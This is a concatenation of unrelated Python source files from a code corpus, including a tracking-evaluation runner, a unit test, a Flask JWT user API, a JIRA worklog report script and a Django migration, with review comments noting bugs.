                      '/home/koehlp/Dokumente/JTA-MTMCT-Mod/deep_sort_mc/feature_extractors/ABD_Net'])
import argparse
import mmcv
import logging
from utils.logger import setup_logger
import os
import json
from evaluation.multicam_evaluation import splitted_multi_cam_evaluation
from evaluation.motmetrics_evaluation import splitted_single_cam_evaluation
class Run_clustering:
    """Runs single-/multi-camera tracking evaluation driven by an mmcv config."""

    def __init__(self, args):
        # The config's root node carries every evaluation setting.
        self.cfg = mmcv.Config.fromfile(args.config).root

        self.cfg.config_basename = os.path.basename(args.config).replace(".py", "")

        # Per-config working directory for logs and results.
        config_run_path = os.path.join(self.cfg.config_run_path, self.cfg.config_basename)
        setattr(self.cfg, "config_run_path", config_run_path)
        os.makedirs(config_run_path,exist_ok=True)

        self.logger = setup_logger("clustering_logger", self.cfg.config_run_path, 0)

        # Dump the effective config for reproducibility.
        self.logger.info(json.dumps(self.cfg, sort_keys=True, indent=4))

    def run(self):
        """Run whichever of the two evaluations the config enables."""
        if self.cfg.evaluate_multi_cam:
            multi_cam_eval_results_folder = os.path.join(self.cfg.config_run_path,"multi_cam_evaluation")
            self.logger.info("Started multi cam evaluation")
            splitted_multi_cam_evaluation(dataset_folder=self.cfg.dataset_folder
                                          ,
                                          track_results_folder=self.cfg.track_results_folder
                                          , results_output_folder=multi_cam_eval_results_folder
                                          , cam_ids=self.cfg.cam_ids
                                          , working_dir=self.cfg.working_dir
                                          , n_parts=self.cfg.n_parts
                                          )
            self.logger.info("Finished multi cam evaluation")

        if self.cfg.evaluate_single_cam:
            single_cam_eval_results_folder = os.path.join(self.cfg.config_run_path,"single_cam_evaluation")
            self.logger.info("Started single cam evaluation")
            splitted_single_cam_evaluation(dataset_folder=self.cfg.dataset_folder
                                           ,
                                           track_results_folder=self.cfg.track_results_folder
                                           , results_output_folder=single_cam_eval_results_folder
                                           , cam_ids=self.cfg.cam_ids
                                           , working_dir=self.cfg.working_dir
                                           , n_parts=self.cfg.n_parts
                                           )
            self.logger.info("Finished single cam evaluation")
def parse_args():
    """Parse command-line arguments; ``--config`` names the config file."""
    cli = argparse.ArgumentParser()
    cli.add_argument("--config", type=str)
    return cli.parse_args()
if __name__=="__main__":
args = parse_args()
run_clustering = Run_clustering(args)
run_clustering.run() | StarcoderdataPython |
3395949 | <reponame>Delhpi/gittest<filename>main.py
import sys

# Print the interpreter path (useful for checking which environment is active).
print(sys.executable)
# FIX: removed a stray non-Python line ("1547现在错误的") that made this file a
# SyntaxError; it appeared to be leftover edit-test garbage.  The Chinese
# comment above it ("modify again") was likewise test residue.
34110 | <reponame>monroid/openvino
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.ops.sparse_reshape import SparseReshape
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
# Graph node attributes for the SparseReshape test graph: three data inputs,
# the op node, and two data outputs.
nodes_attributes = {'input_indices': {'shape': None, 'value': None, 'kind': 'data'},
                    'input_shape': {'shape': None, 'value': None, 'kind': 'data'},
                    'new_shape': {'shape': None, 'value': None, 'kind': 'data'},
                    'sparse_reshape_node': {'op': 'SparseReshape', 'kind': 'op'},
                    'output_indices': {'shape': None, 'value': None, 'kind': 'data'},
                    'output_shape': {'shape': None, 'value': None, 'kind': 'data'}}

# graph 1
edges1 = [('input_indices', 'sparse_reshape_node', {'in': 0}),
          ('input_shape', 'sparse_reshape_node', {'in': 1}),
          ('new_shape', 'sparse_reshape_node', {'in': 2}),
          ('sparse_reshape_node', 'output_indices', {'out': 0}),
          ('sparse_reshape_node', 'output_shape', {'out': 1})]

# 5 sparse indices over a 4x5 dense shape, reshaped to (5, -1, 2).
inputs1 = {'input_indices': {'shape': int64_array([5, 2]), 'value': None},
           'input_shape': {'shape': int64_array([2]), 'value': int64_array([4, 5])},
           'new_shape': {'shape': int64_array([3]), 'value': int64_array([5, -1, 2])}}
class TestSparseReshape(unittest.TestCase):
    """Shape-inference test for the SparseReshape op."""

    def test_partial_infer1(self):
        graph = build_graph(nodes_attributes, edges1, inputs1)
        sparse_reshape_node = Node(graph, 'sparse_reshape_node')
        SparseReshape.infer(sparse_reshape_node)

        # prepare reference results: the -1 in the new shape resolves to
        # 20 / (5 * 2) = 2, and indices gain one column per output dimension.
        ref_output_indices_shape = np.array([5, 3], dtype=np.int32)
        ref_output_shape_value = np.array([5, 2, 2], dtype=np.int32)

        # get the result
        res_output_indices_shape = graph.node['output_indices']['shape']
        res_output_shape_value = graph.node['output_shape']['value']

        self.assertTrue(np.array_equal(ref_output_indices_shape, res_output_indices_shape),
                        'shapes do not match expected: {} and given: {}'.format(ref_output_indices_shape, res_output_indices_shape))
        self.assertTrue(np.array_equal(ref_output_shape_value, res_output_shape_value),
                        'values do not match expected: {} and given: {}'.format(ref_output_shape_value, res_output_shape_value))
| StarcoderdataPython |
57528 | # coding=utf-8
import sys
import petsc4py
petsc4py.init(sys.argv)
from pyvtk import *
import numpy as np
from scipy.io import loadmat
from src import stokes_flow as sf
from src.stokes_flow import problem_dic, obj_dic
from src.geo import *
def main_fun():
    """Load a tetrahedral mesh from a .mat file and write it as a VTK file."""
    matname = 'around'
    if matname[-4:] != '.mat':
        matname = matname + '.mat'
    # Variable names inside the .mat file and the VTK output base name.
    bnodesHeadle = 'bnodes'
    belemsHeadle = 'belems'
    fileHandle = 'tryVTK'

    bgeo = base_geo()
    bgeo.mat_nodes(filename=matname, mat_handle=bnodesHeadle)
    bgeo.mat_elmes(filename=matname, mat_handle=belemsHeadle, elemtype='tetra')
    bnodes = bgeo.get_nodes()
    belems, elemtype = bgeo.get_mesh()
    err_msg = 'mesh type is NOT tetrahedron. '
    assert elemtype == 'tetra', err_msg

    # NOTE(review): the node coordinates themselves are written out as the
    # 'velocity' point data — confirm this placeholder is intended.
    u = bnodes
    vtk = VtkData(
            UnstructuredGrid(bnodes,
                             tetra=belems,
                             ),
            PointData(Vectors(u, name='velocity')),
            ' '
    )
    vtk.tofile(fileHandle)


if __name__ == '__main__':
    main_fun()
| StarcoderdataPython |
3223688 | <reponame>falleco/sample-websockets<filename>socketio_django/runserver.py<gh_stars>0
# gevent monkey-patching MUST run before anything else imports the stdlib
# modules it replaces (socket, ssl, threading, ...), hence the import order.
from gevent import monkey
monkey.patch_all()

import os

# from psycogreen.gevent import patch_psycopg

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "socketio_django.settings")
# patch_psycopg()

from django.core.wsgi import get_wsgi_application
# WSGI entry point used by the SocketIO server below and by WSGI containers.
application = get_wsgi_application()
if __name__ == '__main__':
from socketio.server import SocketIOServer
server = SocketIOServer(('', 8000), application, resource="socket.io")
server.serve_forever() | StarcoderdataPython |
3249005 | # Generated by h2py from /usr/include/sys/fcntl.h
# File-access and fcntl constants (originally generated by h2py from
# /usr/include/sys/fcntl.h).
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_DSYNC = 0x40
O_RSYNC = 0x8000
O_NONBLOCK = 0x80
O_PRIV = 0x1000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_SETLK = 6
F_SETLKW = 7
F_O_GETLK = 5
# Duplicate assignments preserved from the generated source (same values).
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_ISSTREAM = 13
F_GETLK = 14
F_PRIV = 15
F_NPRIV = 16
F_QUOTACTL = 17
F_BLOCKS = 18
F_BLKSIZE = 19
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_REVOKE = 25
# FIX: the generated file used Python 2 octal literals (01, 02, ...), which
# are a SyntaxError in Python 3; rewritten with the 0o prefix (PEP 3127).
F_RDLCK = 0o1
F_WRLCK = 0o2
F_UNLCK = 0o3
F_UNLKSYS = 0o4
O_ACCMODE = 3
FD_CLOEXEC = 1
| StarcoderdataPython |
3287041 | <reponame>seanmanson/euler
import math
# Days per month, January..December, for leap and common years.
daysInMonthLeap = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
daysInMonth = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def isLeapYear(year):
    """Gregorian leap-year test: divisible by 4, except centuries not divisible by 400."""
    if year % 400 == 0:
        return True
    if year % 100 == 0:
        return False
    return year % 4 == 0
# Project Euler 19: count Sundays that fell on the first of the month during
# the twentieth century (1 Jan 1901 .. 31 Dec 2000).  1 Jan 1901 was a Tuesday.
curYear = 1901
curMonth = 1
curDay = 1
curWeekday = 2 #tuesday
numSundaysOnFirst = 0
while curYear < 2001:
    if curDay == 1 and curMonth == 1:
        print(curYear, curWeekday)
    # Weekday 0 represents Sunday.
    if curWeekday == 0 and curDay == 1:
        numSundaysOnFirst+=1
    #iterate
    curWeekday+=1
    if curWeekday >= 7:
        curWeekday = 0
    curDay+=1
    # Roll the day over into the next month, honouring leap-year February.
    if isLeapYear(curYear):
        if curDay > daysInMonthLeap[curMonth-1]:
            curDay = 1
            curMonth+=1
    else:
        if curDay > daysInMonth[curMonth-1]:
            curDay = 1
            curMonth+=1
    if curMonth > 12:
        curMonth = 1
        curYear+=1
print (numSundaysOnFirst)
| StarcoderdataPython |
3247332 | import os
# FIX: the file's original `import os` line was destroyed by extraction
# garbling; re-import it here so os.chdir below works.
import os

from setuptools import setup

# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))

setup(
    name='tech-inventory-update',
    version='0.1',
    author="<NAME>",
    author_email="<EMAIL>",
    install_requires=[
        'requests',
        'gspread',
        'PyYAML',
        'toml',
    ],
    license='Apache License, Version 2.0',
    description=('AXDD Technology spreadsheet updater'),
    url='https://github.com/uw-it-aca/tech-inventory-update',
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.6',
    ],
)
| StarcoderdataPython |
192924 | <filename>farmbeats-server/soilmoisture.py
from grove import adc
class SoilMoistureSensor:
    """Reads a Grove soil-moisture sensor through an ADC channel."""

    def __init__(self, pin: int):
        self.__pin = pin
        self.__adc = adc.ADC()
        # -1 marks "no reading taken yet".
        self.__moisture = -1

    def capture_values(self) -> None:
        """Sample the ADC channel and cache the raw moisture reading."""
        self.__moisture = self.__adc.read(self.__pin)

    @property
    def moisture(self) -> int:
        """Last raw ADC reading, or -1 if capture_values() has not run."""
        # FIX: the original return line was corrupted by a fused dataset
        # marker (" | StarcoderdataPython |"); restored to plain Python.
        return self.__moisture
1644995 | from collections import defaultdict, namedtuple, Counter, deque
import csv
import collections
# NOTE(review): the namedtuple's typename is 'Stats' while the binding is
# `Player`; only repr() exposes the mismatch, but aligning them would be clearer.
Player = collections.namedtuple('Stats', 'player, team, position, height, weight, age, pc')

# Default CSV locations, relative to the working directory.
baseball_csv = './baseball.csv'
fifa_csv = './fifa.csv'
def get_baseball_stats(path=baseball_csv):
    """Parse the baseball CSV into ``{player_name: [Player, ...]}``.

    Rows missing an expected column are skipped instead of aborting the parse.
    """
    with open(path, encoding='utf-8') as f:
        reader = csv.DictReader(f)
        player_dict = collections.defaultdict(list)
        for line in reader:
            try:
                player = line['Name']
                team = line['Team']
                position = line['Position']
                height = line['Height']
                weight = line['Weight']
                age = line['Age']
                pc = line['PosCategory']
            # FIX: dict indexing raises KeyError, not ValueError, so the
            # original `except ValueError` never caught a malformed row.
            # ValueError is kept in case future parsing/conversion raises it.
            except (KeyError, ValueError):
                continue
            p = Player(player=player, team=team, position=position, height=height, weight=weight, age=age, pc=pc)
            player_dict[player].append(p)
    return player_dict
# print(get_baseball_stats(baseball_csv))
get_player_stat = get_baseball_stats()
ryan = (get_player_stat['Ryan_Sweeney'])
ryan = ryan[0]
print(ryan.height)
cnt = Counter()
for player, item in get_player_stat.items():
# cnt[director] += len(movies)
print(player.replace('_', ' '))
item = item[0]
print(item.height)
| StarcoderdataPython |
105819 | <filename>setup.py
#!/usr/bin/env python
import setuptools

__author__ = "<NAME>"

# Long description for PyPI comes straight from the README.
with open("README.md", "r") as f:
    README = f.read()

setuptools.setup(
    name="sea_nwautomation_meetup_oct_2019",
    version="2019.09.15",
    author=__author__,
    author_email="<EMAIL>",
    description="Check out some cool nornir stuff!",
    long_description=README,
    long_description_content_type="text/markdown",
    packages=setuptools.find_packages(),
    install_requires=[],
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Operating System :: POSIX :: Linux",
        "Operating System :: MacOS",
    ],
    python_requires=">=3.6",
)
| StarcoderdataPython |
1699961 | <gh_stars>0
from flask import request
from flask_restful import Resource
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app.utils import str2uuid
from app.api.user.models import User, CoffeeHistory
from app.api.system.models import SystemSetting
from app.security import TokenBlacklist
from app.api.tasks import create_invoice
class UserRegisterApi(Resource):
    """Registration endpoint: creates a new user from the JSON payload."""

    def post(self):
        payload = request.get_json()
        existing = User.find_by_username(payload.get('username'))
        if existing:
            return {"msg": "Dieser Username ist leider bereits vergeben."}, 500
        new_user = User(**payload)
        try:
            new_user.save()
        except:
            return {"msg": "Der User konnte nicht angelegt werde. Ein Fehler ist passiert."}, 500
        return {"msg": "Der User wurde erfolgreich angelegt."}, 201
class UserLoginApi(Resource):
    """Login endpoint: verifies credentials and issues a fresh JWT."""

    def post(self):
        payload = request.get_json()
        account = User.find_by_username(payload.get('username'))
        if not (account and account.check_password(payload.get('password'), account._password)):
            return {"msg": "Invalid credentials"}, 401
        token = create_access_token(identity=str(account.id), fresh=True)
        return {"access_token": token, "username": account.username}, 200
class UserLogoutApi(Resource):
    """Logout endpoint: blacklists the current JWT so it cannot be reused."""

    @jwt_required
    def post(self):
        # The token's unique id (jti) is what gets blacklisted.
        jti = get_raw_jwt()['jti']
        token = TokenBlacklist(jti=jti)
        try:
            token.save()
            return {
                "msg": "Sie wurden erfolgreich ausgeloggt."
            }, 200
        except:
            return {
                "msg": "Es ist ein Fehler beim Ausloggen auftreten."
            }, 500
class UserApi(Resource):
    """Read and update the authenticated user's own record."""

    @jwt_required
    def get(self):
        user = User.find_by_id(get_jwt_identity())
        # NOTE(review): coffee_hist is read before the None check below — a
        # stale id would raise here instead of hitting the 404 path; verify.
        history = user.coffee_hist
        if not user:
            return {
                "msg": "User nicht gefunden."
            }, 404
        return {
            "user": user.json(),
            "history": [ hist.json() for hist in history ]
        }, 201

    @jwt_required
    def put(self):
        user = User.find_by_id(get_jwt_identity())
        data = request.get_json()
        if not user:
            return {
                "msg": "Kein User gefunden!"
            }, 404
        else:
            # NOTE(review): this iterates the model object like a dict
            # (user.items() / user[key]); confirm the User model actually
            # supports the mapping protocol, otherwise this raises.
            for key, value in user.items():
                user[key] = data[key]
        try:
            user.save()
            return {
                "msg": "Daten wurden gespeichert."
            }, 201
        except:
            return {
                "msg": "Etwas ist beim Speicher der User-Daten falsch gelaufen."
            }, 500
class AdminAllUserApi(Resource):
    """Admin endpoint: list every user."""

    @jwt_required
    def get(self):
        admin = User.find_by_id(get_jwt_identity())
        # FIX: previously checked the undefined name `user`, which raised a
        # NameError on every request; the requester is bound to `admin`.
        if not admin.is_admin:
            return {
                "msg": "Sie haben nicht die notwendigen Rechte."
            }, 500
        users = User.get_all()
        return {
            "users": [ user.json() for user in users ]
        }
class AdminUserApi(Resource):
    """Admin endpoint: update an arbitrary user's record."""

    @jwt_required
    def put(self):
        admin = User.find_by_id(get_jwt_identity())
        data = request.get_json()
        # FIX: `data[user_id]` referenced an undefined name (NameError); the
        # client sends the target id under the 'user_id' key.
        user = User.find_by_id(data['user_id'])
        if not admin.is_admin:
            return {
                "msg": "Sie haben nicht die notwendigen Rechte."
            }, 500
        if not user:
            return {
                "msg": "User konnte nicht gefunden werden."
            }, 404
        else:
            # NOTE(review): iterates the model like a dict, mirroring
            # UserApi.put — confirm the User model supports this.
            for key, value in user.items():
                user[key] = data[key]
        try:
            user.save()
            return {
                "msg": "User {username}/{vorname} wurde geupdatet.".format(username=user.username, vorname=user.vorname)
            }
        except:
            return {
                "msg": "Ein Fehler ist beim Speichern aufgetreten."
            }, 500
class AdminSysSettingApi(Resource):
    """Admin endpoint: read/create/update the single system-settings row."""

    @jwt_required
    def get(self):
        sysSetting = SystemSetting.query.filter().first()
        user = User.find_by_id(get_jwt_identity())
        if not user.is_admin:
            return {
                "msg": "Sie haben nicht die notwendigen Rechte."
            }, 500
        if not sysSetting:
            return {
                "msg": "Keine System Einstellungen eingerichtet."
            }, 404
        return {
            "systemSetting": sysSetting.json()
        }, 200

    @jwt_required
    def post(self):
        # FIX: was get_jwt_identit() (typo), which raised a NameError.
        user = User.find_by_id(get_jwt_identity())
        if not user.is_admin:
            return {
                "msg": "Sie haben nicht die notwendigen Rechte."
            }, 500
        data = request.get_json()
        sysSetting = SystemSetting(**data)
        try:
            sysSetting.save()
            return {
                "msg": "System Einstellungen erfolgreich gespeichert."
            }, 201
        except:
            return {
                "msg": "Beim Speichern ist etwas schief gelaufen."
            }, 500

    @jwt_required
    def put(self):
        # FIX: was get_jwt_identit() (typo), which raised a NameError.
        user = User.find_by_id(get_jwt_identity())
        if not user.is_admin:
            return {
                "msg": "Sie haben nicht die notwendigen Rechte."
            }, 500
        data = request.get_json()
        sysSetting = SystemSetting.query.filter().first()
        # NOTE(review): iterates the model like a dict, mirroring the other
        # update endpoints — confirm the model supports this.
        for key, value in sysSetting.items():
            sysSetting[key] = data[key]
        try:
            sysSetting.save()
            return {
                "msg": "System Einstellungen erfolgreich gespeichert."
            }
        except:
            return {
                "msg": "Beim Speichern ist etwas schief gelaufen."
            }, 500
class AdminInvoiceApi(Resource):
    """Admin endpoint: queue invoice e-mails for a list of users."""

    @jwt_required
    def post(self):
        # FIX: was get_jwt_identit() (typo), which raised a NameError.
        user = User.find_by_id(get_jwt_identity())
        if not user.is_admin:
            return {
                "msg": "Sie haben nicht die nötigen Rechte dies zu tun."
            }
        data = request.get_json()
        user_list = data['user_list']
        timeDelta = data['timeDelta']
        # One async task per user; the worker renders and sends the e-mail.
        for each in user_list:
            create_invoice.delay(each['id'], timeDelta)
        return {
            "msg": "Emails werden gesendet."
        }, 201
| StarcoderdataPython |
136118 | <gh_stars>1-10
import receive
import send
def main():
    """Interactive entry point: keep prompting until the user creates a
    network, joins one, or exits.

    FIX: the original defined a helper function inside the ``while`` loop on
    every iteration and used recursion to re-prompt on bad input (which the
    surrounding loop already does), and its error message referred to options
    "S" and "R" that do not exist -- the valid choices are C, J and E.
    """
    while True:
        ans = input("\tC: Create network\n\tJ: Join network\n\tE:Exit\nPlease enter your choice (C/J/E):")
        if ans == "C" or ans == "c":
            send.create_network()
        elif ans == "J" or ans == "j":
            receive.join_network()
        elif ans == "E" or ans == "e":
            exit()
        else:
            print("You must only select either C, J or E")
            print("please try again")


if __name__ == "__main__":
    main()
| StarcoderdataPython |
1755864 | from jira import JIRA
# Flat report-generation script: connects to a JIRA server, walks every
# project, aggregates per-worker worklog time per issue, and appends the
# result to test3.csv (one header row, then one row per issue with logged
# time: Projectid | issueid | issue_desc | Createdate | Resdate | one column
# per worker).
# NOTE(review): the server URL and basic-auth credentials are "*"
# placeholders and must be filled in before the script can run.
import csv
import codecs  # NOTE(review): imported but never used in this script
import datetime

options = {'server': '*'}
jira = JIRA(options, basic_auth=("*", "*"))
projects = jira.projects() # list containing all projects

# loop to print all of the projects
for i in projects:
    print(i)
print("")

# Clears the CSV file before writing reports to it
with open('test3.csv', mode='w') as file:
    pass

all_worker_names = [] # holds the names of all workers
csv_header = [] # header of the csv file
print('loading worker names...')

# Used to append all of workers that existed in any project into both the csv_header and all_worker_names
for project in projects:
    print(project)
    all_issues = jira.search_issues('project="{}"'.format(project)) #list which contains all issues in a project
    # obtains worker names from each issue in each project
    # NOTE(review): jira.issue(...) re-fetches each issue from the server even
    # though search_issues already returned issue objects -- one extra HTTP
    # round-trip per issue throughout this script; confirm before optimising.
    for i in range(len(all_issues)):
        issue = jira.issue(all_issues[i])
        worklogs = jira.worklogs(issue.key) #list of all of the worklegs in an issue
        for worklog in worklogs:
            author = worklog.author #gets the name of the worklog authors
            if str(author) not in all_worker_names: # avoiding repeated names from being added to the lists
                all_worker_names.append(str(author))
                csv_header.append(str(author))
print('worker names have been fully loaded')
print("")

projectcount = 0 # used to indicate the number of projects that have been loaded into the file, this is so the header only gets written once
print('writing reports to csv file...')
# loops through each project to get reports
for projectname in projects:
    print(projectname)
    all_issues = jira.search_issues('project="{}"'.format(projectname)) #list which contains all issues in a project
    issue_list = [] #contains the summary of the issues, the names of workloggers and the time they logged
    worker_name_list = [] #contains the names of the workers that have worked on the project
    WorkerAndTS = [] #will become a 2D list which contains the names of the workers and the times they've worked on each issue
    fullissuelist = [] #this list will contain the summaries of each issue as well as the total amount of hours worked on an issue by each person in the worker_name_list
    #this loop is used to bring down the issue names and the worklogs on each issue
    for i in range(len(all_issues)):
        issue = jira.issue(all_issues[i])
        issue_list.append([issue.fields.summary]) #issue.fields.summary represents the summary of the issue each issue will be put in a 2D list so I can apppend time values to it as well
        fullissuelist.append([issue.fields.summary])
        worklogs = jira.worklogs(issue.key) #list of all of the worklegs in an issue
        for worklog in worklogs:
            author = worklog.author #gets the name of the worklog authors
            time = worklog.timeSpentSeconds #gets the amount of time that has been logged by the authors
            issue_list[i].append(str(author)) #through each iteration, the issue_list will fill up with worklogs and issue names
            issue_list[i].append(str(time))
            #the issue_list at this point will contain names of all issue authors, this include repeated names of the same author. this if statement serves as a function
            #to remove duplicate names from the issue_list by appending them to a new list (worker_name_list)
            if str(author) not in worker_name_list:
                worker_name_list.append(str(author))
    #this function baically splits each item in the worker_name_list, so each worker gets their own nested list, this will be used in order to tie the time spent to the worker who spent it
    for i in range(len(worker_name_list)):
        WorkerAndTS.append([worker_name_list[i]])
    #Looping through all of the issues again in order to add time values to the rearrangedlist
    for i in range(len(all_issues)):
        for j in range(len(WorkerAndTS)): #adds the number 0 to each list in WorkerAndTS for each issue in a project.
            WorkerAndTS[j].append(0) #These 0s represent the amount of hours worked on each project by the worker, based on their worklog
        issue = jira.issue(all_issues[i])
        worklogs = jira.worklogs(issue.key)
        for worklog in worklogs:
            author = worklog.author
            time = worklog.timeSpentSeconds
            #this for loop compares the author that the main for loop is looking at against the the worker name in WorkerAndTS
            for counter in range(len(WorkerAndTS)):
                if str(author) == str(WorkerAndTS[counter][0]):
                    WorkerAndTS[counter][i+1] += time #if the author being looked at
    # ties the issue to the time spent on the issue by each other
    for i in range(len(fullissuelist)):
        for j in range(len(WorkerAndTS)):
            fullissuelist[i].append(WorkerAndTS[j][i+1])
    # This list will only hold issues that have times logged on them, this for loop appends the issues which contain issues that don't have all zeros
    currentlist = []
    for i in range(len(fullissuelist)):
        zeros = 0 # tally of the amount of zeros in an issue
        for j in range(len(fullissuelist[i])):
            if fullissuelist[i][j] == 0:
                zeros += 1 # adds 1 to the tally when a 0 is found
        # compared the amount of zeros to the number of items in the nested list which contains the issue
        if zeros < (len(fullissuelist[i])-1): # since the fullissuelist will only contain the issue summary right now, we only need to detect whether the amount of zeros is equivalent to the length of list without the summary
            currentlist.append(fullissuelist[i]) # if the amount of zeros is less than the length of the list without the summary, this means a worker has logged time on the issue, this means the issue will get appended to the currentlist
    # aesthetic purposes, replaces the 0s in each nested list in currentlist with blank spaces
    for i in range(len(currentlist)):
        for j in range(len(currentlist[i])):
            if currentlist[i][j] == 0:
                currentlist[i][j] = ""
    # obtains the length of each nested list in currentlist, this will be used when appending time
    length_list = []
    for i in range(len(currentlist)):
        length_list.append(len(currentlist[i]))
    # appends the time created and time resolved into the currentlist
    # NOTE(review): the inner loop reuses the name ``i``, shadowing the outer
    # issue index; the outer ``for`` re-binds it each iteration so iteration
    # still proceeds, but the shadowing is fragile -- confirm before editing.
    for i in range(len(all_issues)):
        issue = jira.issue(all_issues[i])
        for i in range(len(currentlist)):
            if len(currentlist[i]) == length_list[i]: # this checks whether the length of the nested list is equal to the length of the list before the created time and resolve time were added
                # this is used in case some of the issues have the same names but different creation dates and resolve dates
                if currentlist[i][0] == issue.fields.summary: # checks to see if the summary in the nested list is the same as the one being looked at by the main loop
                    # this section obtains the date the issue was created and puts it into a traditional day/month/year format
                    date = "{}".format(issue.fields.created)
                    date_obj = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')
                    year = date_obj.strftime("%Y")
                    month = date_obj.strftime("%m")
                    day = date_obj.strftime("%d")
                    timestring = (day+"/"+month+"/"+year)
                    currentlist[i].insert(1, timestring)
                    # this section similar to the creation date formatting, it finds the date of when an issue was resolved
                    if issue.fields.resolutiondate:
                        date = "{}".format(issue.fields.resolutiondate)
                        date_obj = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')
                        year = date_obj.strftime("%Y")
                        month = date_obj.strftime("%m")
                        day = date_obj.strftime("%d")
                        timestring = (day+"/"+month+"/"+year)
                        currentlist[i].insert(2, timestring)
                    # as some issue have not been resolved, they won't have a resolved date, in which case their resolved date will be marked as 'none' in the csv file
                    else:
                        currentlist[i].insert(2, "none")
    # inserts the issue key into the nested list which contains the corresponding issue by matching it with the summary
    for i in range(len(all_issues)):
        issue = jira.issue(all_issues[i])
        summary = issue.fields.summary
        for j in range(len(currentlist)):
            if summary == currentlist[j][0]:
                currentlist[j].insert(0, issue.key)
    # inserts the project name into the nested lists
    for i in range(len(currentlist)):
        currentlist[i].insert(0, projectname)
    # creates a new list which will be used to rearrange the 2D list so it can written to the csv file in the given format
    # csv format is | Projectid | issueid | issue_desc | CreateDate | ResDate | all worker names with their own cell |
    # this for loop adds the project names, the creation date and the resolve date to the new_currentlist
    new_current = []
    for i in range(len(currentlist)):
        new_current.append([currentlist[i][0]])
        for j in range(4):
            new_current[i].append(currentlist[i][j+1])
    # this for loop appends the number 0 for the amount of workers in all_worker_names. This 0 represents the amount of time a worker has worked on the each project in the issues in new_currentlist
    for i in range(len(new_current)):
        for j in range(len(all_worker_names)):
            new_current[i].append(0)
    # this for loops connects the location of the worker in the worker name list with a 0 in the new_currentlist
    for i in range(len(all_issues)):
        issue = jira.issue(all_issues[i])
        worklogs = jira.worklogs(issue.key)
        for worklog in worklogs:
            author = worklog.author
            time = worklog.timeSpentSeconds
            for j in range(len(all_worker_names)):
                if str(author) == all_worker_names[j]:
                    # it obtains the index location of the worker in all_worker_names and then adds the amount of time they logged to the 0 which matches the index inside the new_currentlist
                    for counter in range(len(new_current)):
                        if new_current[counter][2] == issue.fields.summary:
                            new_current[counter][j+5] += time # I add 5 to avoid any of the list items before the 0s
    # aesthetic purposes, replaces the 0s in each nested list inside new_currentlist with blank spaces
    for i in range(len(new_current)):
        for j in range(len(new_current[i])):
            if new_current[i][j] == 0:
                new_current[i][j] = ""
    # if the current project is the first project being written to the csv file, write the headers into the file
    # csv header will only contain the names of the workers at this point, so this section adds the rest of the headers into that list
    if projectcount == 0:
        csv_header.insert(0, 'Resdate')
        csv_header.insert(0, 'Createdate')
        csv_header.insert(0, 'issue_desc')
        csv_header.insert(0, 'issueid')
        csv_header.insert(0, 'Projectid')
    with open ('test3.csv', mode='a', encoding='utf-8') as file: # encoding is used to write characters that the ascii codec cannot encode
        writer = csv.writer(file, delimiter=",", quoting=csv.QUOTE_ALL)
        if projectcount == 0:
            writer.writerow(csv_header)
        for i in range(len(new_current)):
            writer.writerow((new_current[i])) # writes thew new_currentlist which contains the project id, issue id, issue summary. creation date, resolution date and the workers names in that order
    print(projectname, "has been loaded into the file")
    projectcount += 1 # adds 1 to the project counter to say that the first project has been full loaded, this is to avoid the header being written more than once
print('report is ready ^_^')
4831006 | # Generated by Django 2.1.7 on 2019-05-13 08:38
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Auto-generated Django migration altering the ``unique_id`` field on
    several blog models.

    NOTE(review): each ``default=uuid.UUID('...')`` below is a *fixed* value
    baked in at generation time, not a callable -- combined with
    ``unique=True`` every new row created without an explicit value will
    collide after the first insert.  The model layer should use
    ``default=uuid.uuid4`` (the callable) and a new migration should be
    generated; do not hand-edit this already-applied migration.
    """

    dependencies = [
        ('blog', '0017_auto_20190513_0836'),
    ]

    operations = [
        migrations.AlterField(
            model_name='article',
            name='unique_id',
            field=models.CharField(default=uuid.UUID('dec364b0-ae38-462c-bacd-a395870ead80'), max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
        migrations.AlterField(
            model_name='articlecol',
            name='unique_id',
            field=models.CharField(default=uuid.UUID('97a65b13-66d9-4454-8f35-fc42aeb158c2'), max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
        migrations.AlterField(
            model_name='comment',
            name='unique_id',
            field=models.CharField(default=uuid.UUID('b2bad13e-02a6-4fd9-986c-fce08aa7ed8e'), max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
        migrations.AlterField(
            model_name='reward',
            name='unique_id',
            field=models.CharField(default=uuid.UUID('cd72895a-550e-41d4-9e0f-e57dacff7db0'), max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
        migrations.AlterField(
            model_name='tag',
            name='unique_id',
            field=models.CharField(default=uuid.UUID('0b63ecac-0fdf-4be7-8777-edc37588a45c'), max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
        # NOTE(review): unlike its siblings this default is a plain string
